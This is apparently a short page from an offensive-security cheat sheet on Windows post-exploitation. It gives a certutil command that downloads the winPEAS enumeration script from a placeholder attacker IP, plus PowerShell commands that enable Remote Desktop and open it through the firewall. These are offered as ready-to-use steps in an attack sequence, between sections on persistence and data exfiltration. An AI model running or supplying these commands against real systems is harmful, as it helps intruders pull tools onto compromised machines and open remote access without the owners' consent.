Windows

CertUtil download file

certutil.exe -urlcache -split -f "http://<attacker-ip>:8081/winPEAS.bat" winpeas.bat

Enable RDP

Leverage powershell to enable rdp. Remember that by default, only one account can be logged.

#enable RDP
powershell Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -name "fDenyTSConnections" -value 0

#allow rdp through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"

PreviousPersistence NextData Exfiltration

Last updated 3 years ago

Was this helpful?